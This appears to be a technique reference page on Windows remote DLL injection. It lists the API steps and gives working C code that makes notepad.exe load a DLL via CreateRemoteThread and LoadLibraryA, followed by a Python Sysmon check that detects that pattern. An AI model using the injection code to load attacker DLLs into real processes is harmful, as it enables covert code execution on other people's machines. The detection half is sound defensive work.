Remote DLL Injection

Overview

Remote DLL Injection is a process injection technique that forces a remote process to load a given DLL.

It avoids creating a remote thread that starts on a malicious section in the remote process: the only data written into the target is the DLL path, and the new thread starts on a legitimate exported function.

Blueprint

This technique leverages the LoadLibrary Windows API. The idea is to make the remote process execute this API, with the DLL path as its argument. This can be achieved using the following steps:

  1. Open the remote process with OpenProcess
  2. Allocate a new section in the remote process with VirtualAllocEx
  3. Write the absolute path of the DLL into the newly allocated section with WriteProcessMemory
  4. Retrieve the LoadLibrary address with GetProcAddress (kernel32 is mapped at the same base in every process of the same bitness, so the local address is valid in the remote process)
  5. Create a thread in the remote process with CreateRemoteThread, using LoadLibrary as the start routine and the written path as its parameter

#include <windows.h>
#include <string.h>

// The DLL to load (the path is resolved by the remote process)
char dllPath[] = "C:\\Windows\\System32\\amsi.dll";
// Get the remote process handle; getProcHandlebyName is a helper not shown on this page
DWORD PID;
HANDLE processHandle = getProcHandlebyName(L"notepad.exe", &PID);
// Allocate memory in the remote process for the path, including its terminating NUL
SIZE_T pathSize = strlen(dllPath) + 1;
PVOID remoteDllPathAddr = VirtualAllocEx(processHandle, NULL, pathSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// Write the DLL path
WriteProcessMemory(processHandle, remoteDllPathAddr, (LPCVOID)dllPath, pathSize, NULL);
// Get the LoadLibraryA address (same in the remote process, see step 4)
PTHREAD_START_ROUTINE routineAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandleA("Kernel32"), "LoadLibraryA");
// Create and run the new thread: it executes LoadLibraryA(remoteDllPathAddr)
HANDLE threadHandle = CreateRemoteThread(processHandle, NULL, 0, routineAddr, remoteDllPathAddr, 0, NULL);
CloseHandle(threadHandle);
CloseHandle(processHandle);

Once this code is run, amsi.dll is loaded into notepad.exe (screenshot: AMSI.DLL injected into Notepad).
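From the defender's side, the sequence above leaves a distinctive trace: a thread created in another process whose start routine resolves to a LoadLibrary export. As an added example (not part of the original page), the following Python check runs over constructed Sysmon Event ID 8 (CreateRemoteThread) records and flags that pattern; the field names follow Sysmon's Event ID 8 schema, while the sample records, the injector.exe path and the allowlist are constructed.

```python
import json

# Start routines that mark the "make the target call LoadLibrary" pattern described above.
LOADLIBRARY_EXPORTS = frozenset({"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"})

# Constructed Sysmon records (JSON lines), not real telemetry. Event ID 8 is CreateRemoteThread;
# Sysmon fills StartFunction when the thread start address resolves to a known export.
SAMPLE_EVENTS = r"""
{"EventID": 8, "SourceImage": "C:\\tools\\injector.exe", "TargetImage": "C:\\Windows\\System32\\notepad.exe", "StartModule": "C:\\Windows\\System32\\KERNEL32.DLL", "StartFunction": "LoadLibraryA"}
{"EventID": 8, "SourceImage": "C:\\Windows\\System32\\svchost.exe", "TargetImage": "C:\\Windows\\System32\\svchost.exe", "StartModule": "C:\\Windows\\System32\\ntdll.dll", "StartFunction": "RtlUserThreadStart"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe"}
"""


def parse_events(text):
    """Parse JSON-lines Sysmon records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_remote_loadlibrary(event, allowlist=frozenset()):
    """True when a CreateRemoteThread event starts on a LoadLibrary export in another process.

    allowlist holds lower-cased SourceImage paths that legitimately inject DLLs
    (debuggers, accessibility or monitoring agents) and should not be flagged.
    """
    if event.get("EventID") != 8:
        return False
    if event.get("StartFunction") not in LOADLIBRARY_EXPORTS:
        return False
    source = event.get("SourceImage", "").lower()
    target = event.get("TargetImage", "").lower()
    if source == target:
        # Sysmon only records cross-process thread creation; this guard is defensive.
        return False
    return source not in allowlist


def flag_events(text, allowlist=frozenset()):
    """Return the records in text that match the remote LoadLibrary pattern."""
    return [e for e in parse_events(text) if is_remote_loadlibrary(e, allowlist)]


if __name__ == "__main__":
    for hit in flag_events(SAMPLE_EVENTS):
        print(f"{hit['SourceImage']} -> {hit['TargetImage']} via {hit['StartFunction']}")
```

A real deployment would feed events from the Sysmon operational log or a SIEM export instead of SAMPLE_EVENTS; a hit is worth correlating with the target's subsequent image loads (Sysmon Event ID 7) to see which DLL was actually loaded.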
